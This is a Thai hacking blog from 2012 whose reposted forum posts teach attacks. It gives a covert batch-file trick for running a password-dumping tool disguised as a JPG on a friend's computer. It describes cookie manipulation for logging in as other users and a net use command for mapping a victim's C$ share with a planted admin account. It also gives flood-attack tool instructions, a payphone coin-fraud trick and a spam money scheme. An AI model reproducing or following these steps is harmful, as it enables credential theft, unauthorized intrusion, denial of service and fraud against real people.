วันอังคารที่ 31 มกราคม พ.ศ. 2555

การแกะรอย(FingerPrint)

การที่ผู้บุกรุกจะกระทำการใดๆ กับเป้าหมายนั้น ส่วนใหญ่มักจะต้องมีกระบวนการในการสะสมข้อมูลเกี่ยวกับเป้าหมายนั้นๆ ก่อน จากนั้นจึงจะลงมือบุกรุกเข้าไปยังเป้าหมายที่ต้องการ และถ้าทำได้สำเร็จผู้บุกรุกอาจจะติดตั้งซอฟแวร์บางตัวเพื่อซ่อนร่องรอยหรือติดตั้ง backdoor ไว้ในระบบ เพื่อจะได้เข้ามาใช้งานได้ง่ายๆ ในครั้งต่อไป

ดังนั้นใครอยากได้การแกะรอยเอาไปศึกษาได้เลยครับ

โปรแกรม hack password (พวกการ login)

โปรแกรมนี้ชื่อ IEpass โปรแกรมแกรม hack cookie
บางคนจะไม่ค่อย ออกจากระบบ จะสามารถเอารหัสมาได้ง่ายดาย
โปรแกรม
http://www.uppicweb.com/show.php?id=2186212eafc3a0caad3f7be29207c97a
ถ้ามี cookie ในเครื่องมันจะแสดงออกมา
แต่สมมุติว่าไปบ้านเพื่อนแล้วเปิดโปรแกรมนี้ตอนเพื่อนอยู่ด้วยจะทำไม่ได้จึงมีวิธีที่ทำให้เอารหัสมาได้โดยไม่ผิดสังเกต
วิธีทำ
1.เปิด notepad
2.เพิ่มไปว่า @ echo off
                ren 001.jpg 001.exe
                001.jpg /stext 0001.jpg
                ren 001.exe 001.jpg
                end
3.แล้ว sever ชื่ออะไรก็ได้แต่ต้องลงท้ายด้วย .bat
4.โปรแกรมที่โหลดมาเปลียนชื่อเป็น 001.jpg แล้วเอาสองอันนี้ไปไว้ที่เดียวกัน
วิธีใช้
ไปที่เครื่องเพื่อนแล้วคลิกไฟล์ที่สร้าง ด้วย notepad มันจะใช้เวลา 2-3วิ เราจะได้ไฟล์อีกอันมาชื่อ 0001.jpg (ในนี้จะมีรหัสอยู่)
แล้วกลับบ้านไปเปิดไฟล์ 0001.jpg ด้วย notepad จะได้รหัสมาถ้าไม่มีไรอยู่ในไฟล์แสดงว่าเพื่อนออกจากระบบทุกครั้ง

ข้อมูลจาก ruk-com.in.th

มาเลือกทางเดินกันก่อนครับ

Hacker กับหมวกสองใบที่ต้องเลือก

hackerแฮกเกอร์ความหมายเดิมจะหมายถึงนักโปรแกรมที่มีความสนใจหรือความเชี่ยวชาญอย่างลึกซึ้งในระบบคอมพิวเตอร์ถ้าเป็นนักโปรแกรมทั่วไปก็จะสนใจเพียงแค่ว่าทำโปรแกรมให้เสร็จและใช้งานได้ตามต้องการเท่านั้นแต่พวกแฮกเกอร์จะชอบคิดค้นหาวิธีการแปลกๆใหม่ๆ เพื่อให้โปรแกรมทำงานด้วยประสิทธิภาพสูงสุด หรือชอบแก้ไขปัญหาที่ซับซ้อนยุ่งยาก เป็นโปรแกรมเมอร์ที่หมกมุ่นอยู่กับการปรับปรุงโปรแกรมให้ทำงานได้ดีขึ้น ซึ่งหมายรวมถึงผู้เชี่ยวชาญทางด้านโปรแกรมด้วย

cracker แคร็กเกอร์คือผู้ที่หาทางเจาะเข้าสู่ระบบคอมพิวเตอร์ต่างๆโดยไม่ได้รับอนุญาต อาจจะเพื่อความสนุก หรือเพื่อการโจรกรรมและทำลายข้อมูลเป็นคำที่ใช้แทนคำว่า แฮกเกอร์ เพื่อให้คำว่าแฮกเกอร์ยังคงความหมายเดิมว่าเป็นผู้ที่เชี่ยวชาญด้านโปรแกรม และแก้ปัญหาคอมพิวเตอร์ได้เก่ง

แต่ในปัจจุบันนิยม ใช้คำว่าแฮกเกอร์ในความหมายว่าเป็นผู้ที่พยายาม ทำลายการรักษาความปลอดภัย ในระบบคอมพิวเตอร์และเพื่อป้องกันความสับสนเมื่อผู้อ่านต้องไปอ่านเรื่องราว ของแฮกเกอร์ในบทความเรื่องอื่นๆ ผู้เขียนจึงขอใช้คำว่าแฮกเกอร์ในความหมายดังกล่าวนี้

- แฮกเกอร์หมวกดำ (black hat hacker) /แครกเกอร์(Cracker) จัดว่าเป็นแฮกเกอร์ฝ่ายอธรรม นิยมใช้ความสามารถเฉพาะตัวไปในทางที่ผิด มีเจตนามุ่งร้าย ทำให้เกิดปัญหาในระบบคอมพิวเตอร์เป็นแฮกเกอร์ที่เจาะระบบอย่างผิดกฎหมายและสร้างความเสียหายให้เกิดขึ้นใน ระบบข้อมูลคอมพิวเตอร์ ซึ่งแฮกเกอร์ในกลุ่มนี้เป็นกลุ่มที่สร้างความยุ่งยากให้แก่ผู้ที่ดูแลความ ปลอดภัยของระบบคอมพิวเตอร์เป็นอย่างยิ่ง

วันจันทร์ที่ 30 มกราคม พ.ศ. 2555

ตำนาน Hacker (เผื่อคนม่ะรู้นะคับ)

 8) 8) 8)
Credit
คัมภีร์สยบแฮกเกอร์ (#4)
http://www.pantip.com/tech/internet/topic/IT1062643.html

Cookie Manipulation การทำง่ายๆนะครับ

Cookie Manipulation การปรับเปลี่ยน Cookie เพื่อเข้าระบบของคนอื่น

-ปรับเปลี่ยน/โยกย้าย ข้อมูลที่ส่งทาง Cookie
-ข้อมูลที่มักจะถูกส่งทาง Cookies ส่วนใหญ่ได้แก่
-Session ID
-User ID
-Password

-เปลี่ยน Session ID หรือ User ID ใน Cookie เพื่อเข้าถึงระบบด้วยสิทธิ์ของผู้ใช้อื่น
-เครื่องมือที่ใช้ในการแก้ไข Cookie หาง่ายใน Google ครับ
-Cookie Editor (Add-Ons บนบราวเซอร์ Firefox)
- Acunetix - HTTP Editor
- Acunetix - HTTP Fuzzer

วิธีการทำครับ
Nothing for guest!

 แบ่งปันกันครับขอแค่คำขอบคุณ

ข้อมูลจาก ruk-com.in.th

การขโมยข้อมูล (Pilfering)

หัวข้อนี้ก็ไม่ได้มีอะไรสำคัญอีกเหมือนกัน เพียงแต่ ต้องหัดเป็นคนสังเกตุ และก็ งก นิดๆ เหอๆ "ทำไมผมพูดแบบนี้"
ถ้าคุณนั้นสามารถเข้าไปดูไฟล์ต่างๆจากเครื่องเหยื่อได้แล้ว (MapDrive) คุณสามารถที่จะเห็นไฟล์ข้อมูลต่างๆเช่น ไฟล์งานทั่วๆไป ไฟล์ที่เก็บpassword ไฟล์ข้อมูลของบุคคลอื่นๆ ถ้าใส่ใจกับสิ่งแวดล้อมในไฟล์ข้อมูล คุณอาจได้ประโยชน์มากกว่าที่คิดเสียอีก แต่ก็อย่าลืมเรื่องเวลาด้วยนะ อย่าไปเกาะเครื่องเหยื่อนานจนเกินไป เหยื่อคุณอาจไม่หมูก็ได้ และจะโดนสวนกลับ จนหงายเก๋ง
ลองคิดดูว่าถ้าเป็นบริษัทที่มีการแข่งขันกัน อย่างการประมูลราคางานต่างๆ ถ้าโชคดีเข้าไปดูไฟล์ที่บริษัทคู่แข่งส่งประมูล คิดดูว่าบริษัทผมจะได้เปรียบขนาดไหน เวลายื่นซองประมูลงาน เงินที่ผมประมูลต่างจากบริษัทคู่แข่งแค่ 10 บาท เพียงแค่นี้กลายเป็นว่าบริษัทผมชนะการประมูล คิกๆ เรื่องข้อมูล สมัยนี้ถือว่าสำคัญมากๆ เอาเป็นว่าถ้าใครมีข้อมูลเยอะกว่า แน่นอนกว่า จะได้เปรียบมากกว่า จริงมั้ยครับ แต่ผมมักสนใจกับไฟล์รูปมากกว่าอ่า.... ไม่โหดพอ
 
การ Map Drive
และหลังจากที่คุณได้สร้าง User Admin ในเครื่องเหยื่อได้แล้วที่ชื่อ hacker และมี password เป็น passhack และก่อนหน้านี้คุณได้แสกนเครื่องเหยื่อแล้วว่าเครื่องเหยื่อได้เปิด share ที่ไดร์ฟ C: (ถ้า งง กลับไปอ่านเรื่อง scan ใหม)ให้คุณพิมพ์คำสั่งด้านล่างนี้เพื่อเข้าไป MapDrive C: ของเครื่องเหยื่อ
net use \\ 203.114.234.5 \ C$ passhack /u:hacker

วันอาทิตย์ที่ 29 มกราคม พ.ศ. 2555

ถึงเพื่อน ๆ ที่อยากเป็น Hacker !!


โลกเราเองเกิดขึ้นมาไม่รู้กี่ร้อยกี่พันล้านปีมาแล้ว.. อันนั้นไกลเกินไป..
แต่ทุก ๆ ช่วงเวลามีการพัฒนาและมีการเปลี่ยนแปลงตลอดเวลา !!
เมื่อเราเกิดมาแล้วเราก็อยากมีส่วนร่วมในการพัฒนาประเทศชาติ !!

การ ที่เพื่อน ๆ ทุกคนอยากเป็น hacker นั้น เป็นเรื่องดี เพราะอย่างน้อยมันมีคำถามในใจว่า สิ่งนั้นมันทำอะไร มันมีหลักการอย่างไร จะทำอย่างไรที่จะใช้งานมันได้ !!

คราวนี้เมื่อพิจารณาแล้ว hacker แท้จริงต้องเป็นผู้ที่มีประสบการณ์ในเชิงคอมพิวเตอร์สูง..
ถ้า เพื่อน ๆ ใช้ Visual Basic โดยไม่เคยเขียน C/C++ เพื่อน ๆ ก็จะไม่มีทางรู้ได้ว่า ฟังก์ชั่นที่พวกเรา Call นั้นเราจะสร้างมันขึ้นมาใช้อย่างไร !!

ถ้าพวกเรารู้จัก C/C++ แต่พวกเราไม่เคยเขียน Assembly พวกเราก็ไม่รู้ว่าภาย CPU มี Instruction Sets อะไรบ้าง ? เราจะเข้าถึงส่วนสำคัญต่าง ๆ ของฮาร์ดแวร์ได้อย่างไร เช่นอ่าน Sector แรกของ DISK ต่าง ๆ เช่น HDD, FDD ได้อย่าไงไร ? // นี่แบบพื้นฐานที่สุดแล้ว //

ถ้าเราไม่รู้ ในแต่ละชั้น มันก็เกิดการพอกพูนสิ่งไม่รู้เกิดขึ้นเรื่อย ๆ !!
ดัง นั้น HACKER จึงมักเป็นผู้รู้อย่างชัดเจนในแต่ละระดับ ว่าสามารถหรือไม่สามารถทำสิ่งนี้ได้ !! เมื่อรู้ว่าไม่สามารถทำสิ่งนี้ ในระดับนี้ ต้องลงไปในระดับที่ลึกเข้าไป.. เช่น เข้าไปสู่ C/C++ แล้วจึงอิมพลิเมนต์อะไรบางอย่างออกมาเพื่อแก้ปัญหา..

การโกงเครื่องโทรศัทพ์ตู้ จากคุณ อย่างเทพ

บทความยังเป็นเรื่องเกี่ยวกับโทรศัพท์สาธารณะอยู่ ฮุฮุ แต่ว่าอันนี้ยังใช้ได้แน่นอน
อุปกรณ์ที่ใช้ เหรียญ 1 บาท ,เหรียญ 10 บาท, และตู้โทรศัพท์นะท่าน แต่ต้องเป็นตู้ที่ที่หยอดเหรียญ
เป็นแนวตั้งเท่านั้น แนวนอนทำไม่ได้ วิธีคือ ให้วางเหรียญบาทกับเหรียญสิบต่อกัน โดยเหรียญบาท
จะต้องแย่เข้าตรงที่หยอดเหรียญประมาณครึ่งเหรียญ ส่วนเหรียญสิบจะเข้าไปนิดเดียว
แต่ยังไม่ได้หยอดลงตู้นะ แล้วให้ทำการปั่นเหรียญ 10 ขึ้นข้างบน แรงๆ (เดี๋ยวจะงง นึกถึงท่าตบหัวเพื่อน เหมือนกันเลย)
เหรียญ 10 กับเหรียญ 1 บาทจะตกไปพร้อมกัน แต่ผลที่ได้คือ เหรียญ 10 จะตกลงมา แต่เหรียญ 1 บาท
จะอยู่ในตู้ ค่าที่ได้หน้าตู้คือ 10 บาท เสียไปแค่ 1 บาทเท่านั้นเอง
ลองไปทำดูแต่ระวังโดนจับด้วยนะท่าน เดี๋ยวหาว่าไม่เตือน ฮุฮุ

--------------------

ข้อมูลจาก ruk-com.in.th

วันเสาร์ที่ 28 มกราคม พ.ศ. 2555

อยากเป็นวัยรุ่นที่เฟิร์สคลาส ใช้เงินแบบไม่ต้องดูราคา หรือ มีชีวิตที่ไร้ขีดจำกัด

อยากเป็นวัยรุ่นที่เฟิร์สคลาส ใช้เงินแบบไม่ต้องดูราคา หรือ มีชีวิตที่ไร้ขีดจำกัด ถ้าคุณเป็นอย่างที่ว่ามานั้น คุณได้พบโอกาสแล้ว The First Power System ระบบที่เจ๋งที่สุดตอนนี้ รายได้ที่คิดให้เราทุกวันแล้วก็โอนเงินให้เราทุกอาทิตย์ จะดีแค่ไหนที่เงินไม่ต้องช๊อตตลอดเวลา สนใจคลิ๊ก !

>>>>> http://122.155.5.134/~zp4247/ <<<<<
>>>>> http://122.155.5.134/~zp4247/ <<<<<
>>>>> http://122.155.5.134/~zp4247/ <<<<<

หรือติดต่อ
PIN BB : 23979EA5
โทรศัพท์ : 086-410-0566

ข้อมูลจาก ruk-com.in.th

สำหรับ ชาว Hacker มือใหม่ หัดขับ

หลังจากหายหน้าหายไปตั้งนานวันนี้เลยมีบทความมาฝากครับ  :)
บทความที่น่าสนใจสำหรับชาว hack มือใหม่หัดขับ
เป็นบทความที่น่าสนใจนะครับผมเลยไปเอามาลงให้

Computer Laboratory:ระบบเครือข่าย กับ เวิลด์ไวด์เว็บ และ ความปลอดภัย
โดย ดร. ธีรเกียรติ์ เกิดเจริญ

--------------------------------------------------------------------------------
วัตถุประสงค์

เพื่อให้นักศึกษามีความรู้ ความเข้าใจในการทำงานของระบบเน็ตเวอร์ค และ อินเตอร์เน็ตในระดับพื้นฐาน
เพื่อให้นักศึกษาสามารถต่อคอมพิวเตอร์ เข้ากับระบบอินเตอร์เน็ตได้ด้วยตนเอง
เพื่อให้นักศึกษาเรียนรู้การทำงานของ TCP/IP และ HTTP พร้อมทั้งสามารถติดตั้ง Web Server ได้ด้วยตัวเอง
เพื่อให้นักศึกษารู้จักเรื่องของความปลอดภัยในการใช้ ระบบเครือข่าย

--------------------------------------------------------------------------------
สิ่งที่คาดว่าจะได้รับ

หลังจากปฏิบัติการนี้แล้วนักศึกษาเข้าใจว่า ทำไมอินเตอร์เน็ตจึงประสบความสำเร็จกว่าเน็ตเวอร์คอื ่นอย่างเช่น Microsoft networks หรือ Novell
นักศึกษาสามารถเฝ้ามองการทำงานของเน็ตเวอร์ค รู้ว่าข้อมูลไหลไปมาอย่างไร
นักศึกษาเข้าใจการทำงานของ World Wide Web มากขึ้นในรายละเอียด
สามารถติดตั้งให้เครื่องคอมพิวเตอร์ใช้งานอินเตอร์เน ็ตได้ และสามารถติดตั้ง Web Server ได้
รู้จักการระมัดระวังในการใช้เครือข่ายอย่างปลอดภัย

โปรแกรม Flood Attack ที่ควรรู้

ดาวโหลด Shooter.exe


ดาวโหลด Attack 2.5.exe


ดาวโหลด Attack Server


ดาวโหลด ActivePerl-5.10.0.1004


วิธีติดตั้งสคริป
ติดตั้งโปรแกรม ActivePerl-5.10.0.1004
นำ Config.pl ที่แตกไฟร์แล้ว ไปวางไว้ที่ C:\WINDOWS\system32\drivers\etc
 สร้างโฟเดอร์ Logfile ที่ C:\

วิธีใช้ยิง
ดับเบิลคลิกที่ Shooter.exe หรือ Attack.exe
นำหมายเลข IP ที่จะยิง ใส่ที่ช่อง Enter IP :
จากนั้นกด Enter

***หมายเหตุ
ทุกคนคงจะถาม คำถามนี้อยู่เสมอว่า ทำไมถึง ยิงแล้วไม่หลุด เพราะว่า เครื่องตามบ้านเขาใช้เน็ต  ADSL มันหมดแล้ว ตอนนี้

ความเร็วต่ำสุดอยู่ที่  6MB ใช้เน็ตธรรมดาคงไม่หลุดหลอก  :R

วันพฤหัสบดีที่ 26 มกราคม พ.ศ. 2555

คุณคิดแบบผมเปล่า ไม่มีคอมก็สามารถ hack ได้

ในที่นี้ไม่หมายถึงว่าจะ ไม่ใช้อุปกรณ์น่ะ
แบบเราปิดคอมไปแล้ว เราก็สำรวจดีแล้วว่ามันไฟสวิทคอมดับปิดไปแล้ว แล้วถอดปักแล้ว
พอผมตื่นเช้ามาเล่นคอม ปรากฎว่ามีไฟกระพริบหลายจุด เปิดคอมขึ้นปรากฎว่ามัน เป็นโหมด stanby
แล้วอีกเรื่อง ถ้าคุณไม่ใช่ hack แบบเก่าจริงๆ อย่างแสดงตัวตน
เพราะคุณอาจจะโดนแบบผม   >:( >:(

แล้วผมก็ไม่รู้เหมือนคนโดนแบบผม แล้วถ้าขายคอมพิวเตอร์ด้วยแล้ว จะต้องดับวูวไปเลยหรือเปล่า
และสิ่งก็เป็นที่มาของความอยากรู้เกี่ยวกับการ hacker

คอมเครื่องที่ผมใช้อยู่นี้ผมก็ซื้อมาใหม่ ใช้ได้ วันสองวัน ก็โดนซ่ะแล้ว คอมเครื่องเก่า harddisk พังยังไม่ได้ไปซ่อม

ข้อมูลจาก ruk-com.in.th

วันพุธที่ 25 มกราคม พ.ศ. 2555

วิธีเรียกใช้โปรแกรม แบบ Hacker

เอาโปรแกรมที่คุณคิดว่าใช้งานบ่อยเป็นประจำไปใส่ไว้ที่ C:\WINDOWS\system32  

http://upic.me/show/30585785

แล้ว click ที่ properties ในช่อง Start in ให้คุณใส่ข้อความดังนี้ %HOMEDRIVE%%HOMEPATH%

http://upic.me/show/30585808

จากนั้นคุณก็ click ที่ Apply แล้วก็ click OK

พอคุณจะใช้โปรแกรม คุณก็รัน ชื่อโปรแกรมคุณเลย แล้วโปรแกรมก็จะเด้งขึ้นมา

http://upic.me/show/30585832

หรืออีกวิธี คุณก็เข้า Command Promt แล้ว พิมพ์ start ชื่อโปรแกรมของคุณ  

http://upic.me/show/30585896

จากนั้นโปรแกรมก็จะเด้งขึ้นมา

http://upic.me/show/30585928

 ;) ;)

 :D :Dแนว Hacker มั้ยครับ พวกพี่ๆน้องๆ ชื่อไฟล์โปรแกรมผมเปลี่ยนเป็นรหัส 110101  ;D ;D

ข้อมูลจาก ruk-com.in.th
;